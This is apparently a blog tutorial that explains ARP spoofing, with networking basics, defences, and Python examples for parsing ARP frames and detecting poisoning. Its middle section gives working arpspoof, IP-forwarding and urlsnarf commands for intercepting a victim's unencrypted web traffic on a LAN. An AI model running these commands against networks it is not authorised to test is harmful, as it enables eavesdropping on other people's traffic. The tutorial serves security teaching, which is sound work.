How to Explain ARP Spoofing to Your Mom

ARP Spoofing, also referred to as ARP Poisoning, is a type of man-in-the-middle attack where someone sits between a target (victim) and the router to listen in on the online traffic. It is a cyber attack carried out over a Local Area Network (LAN) that involves sending malicious ARP packets to a default gateway on the LAN in order to change the pairings in its IP-to-MAC address table. The ARP protocol translates IP addresses into MAC addresses. If any of that was unclear, by the end of this post you will not only understand it but be able to demonstrate it. And as a bonus you will know how to protect yourself against these attacks.

How the Internet Transmits Data

Before diving into ARP spoofing, we have to take a second and understand the internet’s general communication system. Don’t worry, we will be getting into the fun stuff very shortly. I just want to make sure the reason this attack works is understood first. The three things we are going to cover are packets, MAC addresses, and IP addresses.

Packets

All information on the internet is transmitted via packets. Think of packets as packages that carry the data you need to send. Just like when you send a gift through UPS, you need to give them a few things: the person it is going to and that person’s address. Think of it like the “TO” and “ADDRESS” fields on a package. That is only half the information though; you still have to give them your name and address. Where packets differ is that the “TO” and “FROM” use MAC addresses instead of people’s names, and the “ADDRESS” is filled with IP addresses.

Packets vs Packages

The last thing to touch on about packets is how they get moved around. Routers sort and forward all the packets. Packets make their way through the internet, traveling from router to router like packages travel from post office to post office. Now enough about packets; let’s move on to the next part, MAC addresses.

MAC Addresses

All devices on a network contain something called a Network Interface Card (NIC). That means everything from your laptop to your cell phone has a NIC. To be honest, everything that talks to the internet in some way has a NIC, from your gaming consoles to your smart fridge. They need it so they can send packets as well as receive them, because the NIC is what holds the device’s unique address, the MAC address. This is how the router can tell all the devices on the network apart from one another.

MAC addresses are normally 48-bit numbers written in hexadecimal (for example, AC:F6:F7:B2:AE:81). The first group of three bytes is a vendor-specific number. So in our example AC:F6:F7 belongs to the vendor LG Electronics. The second group of three bytes is whatever the vendor wants to assign. This is so you don’t end up with two devices with the same MAC address on your network. Just imagine the headache of having two people with the same name living together. I’m looking at you, people named Junior and Senior. Now onto the last part of packet identification, IP addresses.

IP Addresses

I’m sure most of you are already aware of IP addresses and what they are, but just in case I’m going to cover them here real quick. IP addresses also identify machines on a network. But wait, if that is true, why do we need MAC addresses at all? Well, networks consist of hierarchical regions, similar to how countries are split into states or provinces, which in turn have cities and towns. Because of the limited number of available IP addresses, not every device can be relied upon to use just IP addresses. An IPv4 address encodes the network hierarchy information in a 32-bit number. This number is typically represented in four sections separated by dots, as in 192.168.3.1. IP addresses in the same region of this hierarchy also share the same upper-level bits; the further to the left in the IP address, the higher the bit.

Here is an example: all machines on the University of Virginia campus have IPv4 addresses like 128.143.***.***. You might also run into this written as 128.143.1.1/16; that is how a subnet is written using Classless Inter-Domain Routing (CIDR). Luckily you don’t need to know all that for now, as subnets are a real monster to get your head around. At least they are for me. All you need to know is that because IP addresses follow a particular structure, routers can use parts of the IP address to decide how to route a packet through the hierarchy in the most efficient way. So with a mixture of subnets, IPs and MAC addresses, you can use your devices easily.

What are ARP Tables

Now that the main internet topics have been covered, you have a better understanding of the juggling act that goes on every time a packet gets sent. Once a packet gets to the LAN, the network uses the packet’s MAC address to determine the machine or device that it belongs to. But how does the router know what MAC address belongs to what IP address? Simple: it sends something called an ARP query to all machines on the network, and the machine that owns that IP address responds with its MAC address. But if your router had to go through that process every time it got a packet to send or receive, Netflix would still be a DVD rental business.

So if performing that entire process of query and response to find a packet’s destination (not to mention the best route) is slow, how do we speed it up? That’s right, ARP tables to the rescue. Once the router gets a response to an ARP query, it saves the response in its ARP table. By keeping track of this information it limits the number of times it needs to ask which MAC address belongs to the packet’s IP.

To summarize what we have covered so far: MAC addresses identify who you are, IP addresses identify where you are, and ARP tables keep track of the mapping.
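To make the query and response concrete, here is an added example (not code from the original post) that decodes the two kinds of ARP packet a router and a host exchange: a broadcast “who has this IP?” request and the unicast “that IP is at this MAC” reply. The two frames are constructed by hand, reusing the router and host addresses that appear later in this post’s netdiscover output; only the Python standard library is assumed.

```python
import struct

ETHERTYPE_ARP = 0x0806
OPCODES = {1: "request", 2: "reply"}

def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)

def parse_arp_frame(frame: bytes) -> dict:
    # Ethernet header (14 bytes) followed by the RFC 826 ARP layout:
    # hardware type, protocol type, address lengths, opcode, sender and target pairs.
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not an ARP frame (ethertype 0x{ethertype:04x})")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("only Ethernet/IPv4 ARP is handled here")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {
        "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src),
        "op": OPCODES.get(oper, f"unknown({oper})"),
        "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
        "sender_oui": mac_str(sha[:3]),          # vendor part of the sender's MAC
        "target_mac": mac_str(tha), "target_ip": ip_str(tpa),
    }

# Constructed sample frames (not captured traffic) built from the NETGEAR router
# and the second host shown in this post's netdiscover output.
# 1) Broadcast request: "who has 192.168.0.3? tell 192.168.0.1"
SAMPLE_REQUEST = bytes.fromhex(
    "ffffffffffff 08028e88c3cb 0806"            # Ethernet: dst, src, ethertype
    "0001 0800 06 04 0001"                      # ARP: htype ptype hlen plen opcode
    "08028e88c3cb c0a80001"                     # sender MAC / sender IP
    "000000000000 c0a80003"                     # target MAC (unknown yet) / target IP
)
# 2) Unicast reply: "192.168.0.3 is at e8:9f:80:7c:bd:2b"
SAMPLE_REPLY = bytes.fromhex(
    "08028e88c3cb e89f807cbd2b 0806"
    "0001 0800 06 04 0002"
    "e89f807cbd2b c0a80003"
    "08028e88c3cb c0a80001"
)
```

Feeding SAMPLE_REQUEST and SAMPLE_REPLY to parse_arp_frame shows exactly which fields a device reads before writing a line into its ARP table.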

ARP Spoofing Attacks Explained

Now that all the basic explanations are taken care of, let’s get to the fun stuff. An ARP spoofing attack consists of two steps. The first step is that an attacker sends a fake ARP response to the victim, saying that the attacker’s device is the router for the LAN. This makes the victim’s system think that all of its packets need to be passed to the attacker before getting to where they need to go. This works because, like the router, devices have ARP tables so they don’t have to keep reaching out when they want to send something. The second step is that when the attacker receives packets from the victim, it forwards them on to the real LAN router. While you could just drop the traffic and not forward it, that wouldn’t be much of a Man-in-the-Middle (MITM) attack.

While that is all you need in order to perform an ARP spoofing attack, if you want to get your hands on even more data you are going to have to take an extra step. We do the same thing as before, but this time telling the router that you are the victim machine instead of telling the victim that you are the router. By doing this you get to see and forward the responses as well, as long as the packets are unencrypted. Now that we know what an ARP spoofing attack is, let’s get into the how.

Performing Your Own ARP Spoofing Attack

Before we perform an ARP spoofing attack, let’s make sure we have all the requirements covered. You are going to need dsniff, netdiscover, arpspoof, and urlsnarf. While these tools can be swapped out, like changing dsniff for netcat or urlsnarf for Wireshark, they are the ones I’m going to use for this demonstration. I’m also going to be doing this on an Ubuntu system to show you don’t always need Kali for hacking (I still encourage everyone to check Kali out though). Before installing via apt-get, always make sure to update first.

codebycody@TJOH:~$ sudo -i
codebycody@TJOH:~$ apt-get update
codebycody@TJOH:~$ apt-get install dsniff

Now we can start looking for devices to target on the network using netdiscover.
codebycody@TJOH:~$ netdiscover
Currently scanning: 172.27.139.0/16 | Screen View: Unique Host

27 Capptured ARP Req/Rep packets, from 15 hosts. Total size: 1534
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.1 08:02:8e:88:c3:cb 11 660 NETGEAR
192.168.0.3 e8:9f:80:7c:bd:2b 3 180 Unknown vender


Above you can see the response gave us back the MAC address of the router, in this case a NETGEAR device, as well as a target. In order to allow your machine to forward packets, you have to set the IP forwarding flag for your system. On Ubuntu and Kali you set this flag by running the command echo 1 > /proc/sys/net/ipv4/ip_forward. Now we can start ARP spoofing by running the following command: arpspoof -i eth0 -t <VICTIM_IP> <ROUTER_IP>. Just remember you need to run the command again with the victim IP and the router IP swapped. This will keep you in the middle for both outgoing and incoming responses. Now you can run urlsnarf to capture unencrypted packets being sent between the two devices, as follows.
codebycody@TJOH:~$ urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
192.168.0.11 - - [14/Nov/2021:16:50:39 -0500] "GET http://thejoyofhacking.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (Linux; Android 10; LM-G820) AppleWebkit/537.36 (KHTML, like Gecko) Chrom/95.0.4638.74 Mobile Safari/537.36

How to Protect Against ARP Spoofing Attacks

Although it’s difficult to prevent an ARP spoofing attack, encrypting your internet traffic helps protect your information from being stolen or modified. Any traffic sent over an HTTPS connection is encrypted. However, manually checking to ensure that every URL you visit uses HTTPS is tedious, so the Electronic Frontier Foundation (eff.org) has created a web browser extension (for Chrome, Edge, Firefox and Opera) called HTTPS Everywhere that ensures that all your web traffic goes over an HTTPS connection. Installing this plug-in is a great way to keep your friends, family and yourself safe against ARP spoofing.
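Encryption hides the contents, but the poisoning itself is still visible on the LAN: the attack described above makes one IP address suddenly answer from a different MAC, and the two-sided version makes one MAC answer for two IPs. As an added example (not from the original post, and not a real tool), here is a minimal monitor in the spirit of arpwatch that flags those changes; the observations are a constructed list reusing the router and host from the netdiscover output, with 02:00:00:aa:bb:cc as an invented third device.

```python
from dataclasses import dataclass, field

# Constructed observations of ARP replies seen on the wire: (seconds, sender IP, sender MAC).
# 192.168.0.1 is the NETGEAR router and 192.168.0.3 the host from the netdiscover output;
# 02:00:00:aa:bb:cc is a made-up device that starts answering for both of them.
OBSERVED_REPLIES = [
    (0, "192.168.0.1", "08:02:8e:88:c3:cb"),
    (1, "192.168.0.3", "e8:9f:80:7c:bd:2b"),
    (5, "192.168.0.1", "08:02:8e:88:c3:cb"),
    (9, "192.168.0.1", "02:00:00:aa:bb:cc"),   # gateway IP now claimed by another MAC
    (9, "192.168.0.3", "02:00:00:aa:bb:cc"),   # same MAC also claims the host IP (two-sided)
    (11, "192.168.0.1", "08:02:8e:88:c3:cb"),  # real router still answering: flip-flop
]

@dataclass
class ArpMonitor:
    gateway_ip: str
    current: dict = field(default_factory=dict)   # ip -> mac last seen answering for it
    claims: dict = field(default_factory=dict)    # mac -> set of ips it has answered for
    alerts: list = field(default_factory=list)

    def observe(self, ts: int, ip: str, mac: str):
        """Record one ARP reply; return an alert string if the IP-to-MAC pairing changed."""
        mac = mac.lower()
        self.claims.setdefault(mac, set()).add(ip)
        prev = self.current.get(ip)
        self.current[ip] = mac
        if prev is None or prev == mac:
            return None                      # first sighting, or nothing changed
        # A changed pairing is what a poisoned ARP table looks like from the outside;
        # the gateway changing is the most dangerous case, so rank it higher.
        severity = "HIGH" if ip == self.gateway_ip else "MEDIUM"
        msg = f"t={ts} {severity}: {ip} changed from {prev} to {mac}"
        others = sorted(self.claims[mac] - {ip})
        if others:
            msg += f" (this MAC also claims {others})"
        self.alerts.append(msg)
        return msg

def run_monitor(records, gateway_ip: str) -> list:
    """Feed (ts, ip, mac) replies through the monitor and return every alert raised."""
    mon = ArpMonitor(gateway_ip)
    for ts, ip, mac in records:
        mon.observe(ts, ip, mac)
    return mon.alerts

if __name__ == "__main__":
    for line in run_monitor(OBSERVED_REPLIES, "192.168.0.1"):
        print(line)
```

A real deployment would feed this from a packet capture and compare against the output of ip neigh or arp -a on the hosts, but the rule is the same: the gateway’s MAC should never change on its own, and one MAC should rarely answer for several IPs.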